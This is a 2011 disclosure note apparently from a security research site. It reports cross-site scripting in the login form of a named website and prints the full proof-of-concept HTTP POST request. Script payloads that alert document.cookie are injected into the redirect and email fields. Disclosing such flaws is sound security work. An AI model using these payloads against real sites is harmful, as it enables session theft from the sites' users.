XSS.CX Research Note | April 18, 2011 @ 2000 US Eastern
XSS is confirmed throughout the Site. The Listing is specific to the Login Form being Vulnerable to XSS.
This HTTP Get (below) is the actual Proof of Concept used to test and confirm the XSS Vulnerability.
A retest is available at any time, let us know if we can help.
===================================================================================================================
POST /users/action/login HTTP/1.1
Host: www.viglink.com
Connection: keep-alive
Referer: http://www.viglink.com/users/login?_ek=yp&ar=/users/action%3F%22onmouseover%3Dprompt(947209)%3E5698e%3Cscript%3Ealert(document.cookie)%3C/script%3Ece99c61ebc1
Content-Length: 214
Cache-Control: max-age=0
Origin: http://www.viglink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Referrer.p=12412; vglnk.Agent.p=9575d1dc8a75bde845888cc1edb03cf2; __utmz=54157999.1303153867.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=A823B29B187609CC7FB2AB037A3C7339; __utma=54157999.1214478760.1303153867.1303153867.1303170631.2; __utmc=54157999; __utmb=54157999.1.10.1303170631

authRedirect=%2Fusers%2Faction%3F%22onmouseover%3Dprompt%28947209%29%3E5698e%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ece99c61ebc1&email=2b08d"><script>alert(document.cookie)</script>c0fa7bd59e7&password=